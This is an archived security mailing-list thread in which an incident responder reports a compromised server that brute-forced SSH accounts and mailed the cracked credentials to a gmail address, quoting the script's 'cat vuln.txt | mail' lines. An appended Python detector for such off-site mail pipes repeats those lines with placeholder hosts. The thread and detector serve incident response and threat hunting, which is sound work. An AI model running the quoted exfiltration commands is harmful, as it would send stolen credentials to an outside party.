[nsp-sec] gmail account receives compromised ssh accounts

Peter Moody pmoody at google.com
Tue Nov 22 11:06:42 EST 2011


ack.

On Tue, Nov 22, 2011 at 7:53 AM, Torsten Voss <voss at dfn-cert.de> wrote:

> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hello,
>
> we've found a compromised server which was attacking other systems with ssh
> account probes. The script sends the ssh user+passwords to:
>
> facut.la.vrajeala at gmail.com
>
> Script-lines:
> cat vuln.txt | mail -s "L-amPrins" facut.la.vrajeala at gmail.com
> cat vuln.txt | mail -s 'We Got Roots' facut.la.vrajeala at gmail.com
>
>
> Kind regards,
>  Torsten, AS680
>
> - --
> Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
>
> DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone  +49 40 808077-590
> Registered office / Register: Hamburg, AG Hamburg, HRB 88805, VAT ID:  DE 232129737
> Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
>
> Automatic warning messages               https://www.cert.dfn.de/autowarn
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v2.0.16 (GNU/Linux)
> Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/
>
> iEYEARECAAYFAk7LxYIACgkQLn8qYyAllOS+1QCcCRAfRQjZm+Dmt3wZqQpFw0sA
> 8eIAnApNm8Ib5aGofxdNgkOaUmfbZSrY
> =1CSX
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>



-- 
Peter Moody      Google    1.650.253.7306
Security Engineer  pgp:0xC3410038
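
A way to hunt for the pattern reported in this thread (a script piping a results file into a command-line mail client addressed off-site), as an added example that is not part of the original messages. The sample script, the placeholder recipient addresses, the `INTERNAL_DOMAINS` allowlist and the function names are assumptions made for illustration.

```python
import shlex

MAILERS = {"mail", "mailx", "mutt", "sendmail"}  # command-line mail clients
INTERNAL_DOMAINS = {"example.org"}  # assumption: the site's own mail domains

# Constructed sample script; recipient addresses are placeholders.
SAMPLE = """#!/bin/sh
./job > vuln.txt
cat vuln.txt | mail -s "L-amPrins" collector@mail.example
cat vuln.txt|/usr/bin/mail -s 'We Got Roots' collector@mail.example
df -h | mail -s "disk report" ops@example.org
echo "unterminated | mail -s x y@mail.example
"""

def pipeline_stages(line):
    """Split a shell line into (fed_by_pipe, tokens) stages, honouring quotes."""
    lex = shlex.shlex(line, posix=True, punctuation_chars="|;&")
    lex.whitespace_split = True  # keep user@host and -s as single tokens
    stages, current, piped = [], [], False
    for tok in lex:
        if tok and set(tok) <= set("|;&"):  # separator: |, ||, &&, ; or &
            if current:
                stages.append((piped, current))
            current, piped = [], tok == "|"
        else:
            current.append(tok)
    if current:
        stages.append((piped, current))
    return stages

def find_mail_exfil(text):
    """Return (line_no, recipient, subject, upstream command) for every mail
    client invocation whose recipient is outside INTERNAL_DOMAINS."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        try:
            stages = pipeline_stages(line)
        except ValueError:  # unbalanced quotes: cannot be tokenized, skip
            continue
        for i, (piped, stage) in enumerate(stages):
            if stage[0].rsplit("/", 1)[-1] not in MAILERS:
                continue
            subject = stage[stage.index("-s") + 1] if "-s" in stage[:-1] else ""
            upstream = " ".join(stages[i - 1][1]) if piped and i else ""
            for tok in stage[1:]:
                domain = tok.rpartition("@")[2].lower()
                if "@" in tok and tok != subject and domain not in INTERNAL_DOMAINS:
                    hits.append((no, tok, subject, upstream))
    return hits
```

Run over cron jobs, shell histories and files dropped in world-writable directories; each hit gives the recipient and the command whose output was being mailed out.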


